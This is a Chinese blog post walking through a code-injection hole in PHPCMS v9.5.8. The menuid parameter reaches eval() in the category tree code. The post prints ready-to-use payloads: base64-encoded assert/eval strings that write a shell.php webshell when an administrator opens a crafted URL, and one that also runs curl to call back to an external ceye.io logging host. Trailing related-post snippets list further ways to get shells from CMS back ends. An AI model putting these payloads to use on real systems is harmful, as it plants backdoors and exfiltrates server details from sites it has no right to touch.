参考url:https://xianzhi.aliyun.com/forum/read/1507.html

poc:index.php??m=content&c=content&a=public_categorys&menuid=${@phpinfo()}

根据拿到的poc,phpcms的mvc结构,代码位于/phpcms/modules/content/content.php  第472-532行

	public function public_categorys() {

		$show_header = '';

		$cfg = getcache('common','commons');

		$ajax_show = intval($cfg['category_ajax']);

		$from = isset($_GET['from']) && in_array($_GET['from'],array('block')) ? $_GET['from'] : 'content';

		$tree = pc_base::load_sys_class('tree');

		if($from=='content' && $_SESSION['roleid'] != 1) {

			$this->priv_db = pc_base::load_model('category_priv_model');

			$priv_result = $this->priv_db->select(array('action'=>'init','roleid'=>$_SESSION['roleid'],'siteid'=>$this->siteid,'is_admin'=>1));

			$priv_catids = array();

			foreach($priv_result as $_v) {

				$priv_catids[] = $_v['catid'];

			}

			if(empty($priv_catids)) return '';

		}

		$categorys = array();

		if(!empty($this->categorys)) {

			foreach($this->categorys as $r) {

				if($r['siteid']!=$this->siteid ||  ($r['type']==2 && $r['child']==0)) continue;

				if($from=='content' && $_SESSION['roleid'] != 1 && !in_array($r['catid'],$priv_catids)) {

					$arrchildid = explode(',',$r['arrchildid']);

					$array_intersect = array_intersect($priv_catids,$arrchildid);

					if(empty($array_intersect)) continue;

				}

				if($r['type']==1 || $from=='block') {

					if($r['type']==0) {

						$r['vs_show'] = "<a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=".$r['catid']."&type=show' target='right'>[".L('content_page')."]</a>";

					} else {

						$r['vs_show'] ='';

					}

					$r['icon_type'] = 'file';

					$r['add_icon'] = '';

					$r['type'] = 'add';

				} else {

					$r['icon_type'] = $r['vs_show'] = '';

					$r['type'] = 'init';

					$r['add_icon'] = "<a target='right' href='?m=content&c=content&menuid=".$_GET['menuid']."&catid=".$r['catid']."' onclick=javascript:openwinx('?m=content&c=content&a=add&menuid=".$_GET['menuid']."&catid=".$r['catid']."&hash_page=".$_SESSION['hash_page']."','')><img src='".IMG_PATH."add_content.gif' alt='".L('add')."'></a> ";

				}

				$categorys[$r['catid']] = $r;

			}

		}

		if(!empty($categorys)) {

			$tree->init($categorys);

				switch($from) {

					case 'block':

						$strs = "<span class='\$icon_type'>\$add_icon<a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=\$catid&type=list' target='right'>\$catname</a> \$vs_show</span>";

						$strs2 = "<img src='".IMG_PATH."folder.gif'> <a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=\$catid&type=category' target='right'>\$catname</a>";

					break;

					default:

						$strs = "<span class='\$icon_type'>\$add_icon<a href='?m=content&c=content&a=\$type&menuid=".$_GET['menuid']."&catid=\$catid' target='right' onclick='open_list(this)'>\$catname</a></span>";

						$strs2 = "<span class='folder'>\$catname</span>";

						break;

				}

			$categorys = $tree->get_treeview(0,'category_tree',$strs,$strs2,$ajax_show);

		} else {

			$categorys = L('please_add_category');

		}

        include $this->admin_tpl('category_tree');

		exit;

	}

  

在当前函数开始下个断点

跟到526行:

$categorys = $tree->get_treeview(0,'category_tree',$strs,$strs2,$ajax_show);

  

进入了get_treeview()函数,跟入进去,

函数位于 /phpcms/libs/classes/tree.class.php  第206-239行。

* @param $myid 表示获得这个ID下的所有子级
* @param $effected_id 需要生成treeview目录数的id
* @param $str 末级样式
* @param $str2 目录级别样式
* @param $showlevel 直接显示层级数,其余为异步显示,0为全部限制
* @param $style 目录样式 默认 filetree 可增加其他样式如'filetree treeview-famfamfam'
* @param $currentlevel 计算当前层级,递归使用 适用改函数时不需要用该参数
* @param $recursion 递归使用 外部调用时为FALSE
   function get_treeview($myid,$effected_id='example',$str="<span class='file'>\$name</span>", $str2="<span class='folder'>\$name</span>" ,$showlevel = 0 ,$style='filetree ' , $currentlevel = 1,$recursion=FALSE) {

        $child = $this->get_child($myid);

        if(!defined('EFFECTED_INIT')){

           $effected = ' id="'.$effected_id.'"';

           define('EFFECTED_INIT', 1);

        } else {

           $effected = '';

        }

		$placeholder = 	'<ul><li><span class="placeholder"></span></li></ul>';

        if(!$recursion) $this->str .='<ul'.$effected.'  class="'.$style.'">';

        foreach($child as $id=>$a) {

        	@extract($a);

			if($showlevel > 0 && $showlevel == $currentlevel && $this->get_child($id)) $folder = 'hasChildren'; //如设置显示层级模式@2011.07.01

        	$floder_status = isset($folder) ? ' class="'.$folder.'"' : '';

            $this->str .= $recursion ? '<ul><li'.$floder_status.' id=\''.$id.'\'>' : '<li'.$floder_status.' id=\''.$id.'\'>';

            $recursion = FALSE;

            if($this->get_child($id)){

            	eval("\$nstr = \"$str2\";");

            	$this->str .= $nstr;

                if($showlevel == 0 || ($showlevel > 0 && $showlevel > $currentlevel)) {

					$this->get_treeview($id, $effected_id, $str, $str2, $showlevel, $style, $currentlevel+1, TRUE);

				} elseif($showlevel > 0 && $showlevel == $currentlevel) {

					$this->str .= $placeholder;

				}

            } else {

                eval("\$nstr = \"$str\";");

                $this->str .= $nstr;

            }

            $this->str .=$recursion ? '</li></ul>': '</li>';

        }

        if(!$recursion)  $this->str .='</ul>';

        return $this->str;

    }

  这里有个判断:

if($this->get_child($id))

当第一次执行为ture的时候,还是会再次执行get_treeview的内容

$this->get_treeview($id, $effected_id, $str, $str2, $showlevel, $style, $currentlevel+1, TRUE);

第二次执行的时候$myid由0变成了1,

下图的$myid是 $id的值

这时候的$newarr为空,

if就不执行,转而执行elseif和else,而$str包含着menuid的值,也就是${@phpinfo()} ,这时候eval() 就执行了php代码。

这要管理员权限才能代码执行,修改下payload,管理员一访问就在当前域名的首页路径下生成shell。

/index.php?m=content&c=content&a=public_categorys&menuid=${@(assert(base64_decode(ZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycpOw)))}

密码1

还有另一种payload,会回显的提醒。

自动curl请求你的域名,然后回显网站url

print_r(base64_encode("fputs(fopen('shell.php','w'),'<?php eval(\$_POST[2]);');system('curl '.\$_SERVER[\"SERVER_NAME\"].'4321.nrcuf9.ceye.io');"));

  先输出base64的地址,然后在替换下面的字符串

/index.php?m=content&c=content&a=public_categorys&menuid=(${@(assert(eval(base64_decode(ZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbMl0pOycpO3N5c3RlbSgnY3VybCAnLiRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLic0MzIxLm5yY3VmOS5jZXllLmlvJyk7))))})

这个字符串有几个点提醒下自己, assert()函数执行执行一句php代码,所以在assert前面加个eval,执行多条语句。

如果有读者读到这篇,求告知php的${} 作用。

解答:在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。注意:双引号中的函数不会被执行和替换。

在这里我们需要通过{${}}构造出了一个特殊的变量。

参考:http://www.redicecn.com/html/PHP/20100607/149.html

phpcmsV9.5.8 后台拿shell的更多相关文章

  1. CreateLiveCMSV4.0 漏洞,无需后台Get shell

    Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需 ...

  2. KesionCMS V6.5后台拿SHELL方法

    Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下 ...

  3. appium 后台运行shell脚本

    appium 在后台运行,把启动appium命令保存为一个shell文件,文件名包含appium,如start_appium.sh.由于启动前要杀掉已经启动的appium服务, BUILD_ID=do ...

  4. wordpress 5.1 后台拿shell

    闲着没事搭建了一套最新版wordpress 5.1,本身wordpress后台安全防御是比较差的,想尝试下后台是否可以拿shell. 再上传插件的地方可以直接上传php文件,并且该文件可以执行: sh ...

  5. 另类dedecms后台拿shell

    遇到一个被阉割的后台,发现直接传shell显然不行. 然后就有了下文 添加一个新广告. 插入一句话木马: --><?php $_GET[c]($_POST[x]);?><!-- ...

  6. 动易cms .net版本后台拿shell

    PS:前提是要有IIS6.0的析漏洞 网上我找了好一会儿没有找到.直奔主题.至于怎么弄到密码,全靠坑蒙拐骗. 系统设置=>模板标签管理=>模板管理 然后选则上传模板(如果新建的话会被限制掉 ...

  7. emblog后台拿shell

    emlog版本:5.3.1 先本地弄好shell 新建一个文件夹,里面放shell,shell名称和文件名要一致.压缩为zip 然后在安装插件处上传. 成功后的路径content/plugins/te ...

  8. linux下后台执行shell脚本nohup

    (一)使用nohup后台执行脚本 脚本执行结果记录到nohup.out文件中 (二)使用&后台执行脚本 使用&符号在后台执行命令或脚本后,如果你退出登录,这个命令就会被自动终止掉

  9. phpmyadmin后台拿shell方法总结

    方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...

随机推荐

  1. 【分布式系列之dubbo】SSM+Dubbo实战

    对于传统的单一构架,也就是打成的war或者ear包部署在同一个Web容器里的构架,它虽然开发.测试.部署简单,但随着业务的不断发展,维护成本增加,可扩展性差,而且一台Tomcat的并发数在500左右, ...

  2. Java读取文件存储到mysql

    写了一批Lua脚本,要放到数据库里面,调用的时候进行计算,由于有太多lua脚本,就写了个程序来录入. 下面主要分三个部分: public static String readToString(Stri ...

  3. 操作 numpy 数组的常用函数

    操作 numpy 数组的常用函数 where 使用 where 函数能将索引掩码转换成索引位置: indices = where(mask) indices => (array([11, 12, ...

  4. django模型——数据库(二)

    模型--数据库(二) 实验简介 模型的一些基本操作,save方法用于把对象写入到数据库,objects是模型的管理器,可以使用它的delete.filter.all.order_by和update等函 ...

  5. 《高级软件测试》web测试实践--12月30日记录

    考完数学,我们正式开始web测试实践的作业,今天,我们主要进行了方案的选择和人员的分工.任务计划和安排如上图所示. 任务进展:完成题目选择和人员分工: 遇到问题:暂无: 下一步任务:完成软件评测.用户 ...

  6. vue初尝试--新建项目

    这是一篇技术贴--如何新建一个基于vue的项目 1.下载对应版本的nodejs安装,下载的nodejs都集成了npm,所以nodejs安装完成之后npm也对应安装完成了. 安装完成之后可以在cmd命令 ...

  7. 【ASP.NET Core】依赖注入高级玩法——如何注入多个服务实现类

    依赖注入在 ASP.NET Core 中起中很重要的作用,也是一种高大上的编程思想,它的总体原则就是:俺要啥,你就给俺送啥过来.服务类型的实例转由容器自动管理,无需我们在代码中显式处理. 因此,有了依 ...

  8. c 存储类型

    1,c语言中的存储类型(定义变量和函数的可见范围和生命周期)这些说明符放置在它们所修饰的类型之前.下面列出 C 程序中可用的存储类: auto register static extern 2,aut ...

  9. LXC学习实践(1)LXC的概念和用途

    1.LXC是什么? LXC是Linux containers的简称,是一种基于容器的操作系统层级的虚拟化技术,Sourceforge上有LXC这个开源项目. 2.LXC能做什么? LXC和Linux内 ...

  10. IDE-Ecplise-代码注释 模版 编码规范 配色

    说明: 代码注释主要用于方便代码后期维护,编码规范,增加代码阅读性和维护性.因网上看到的很多博客中片段局多,故整理后重写一篇,方便交流学习. 先看下加过注释模版后的效果. 如上图所示,创建类,方法和继 ...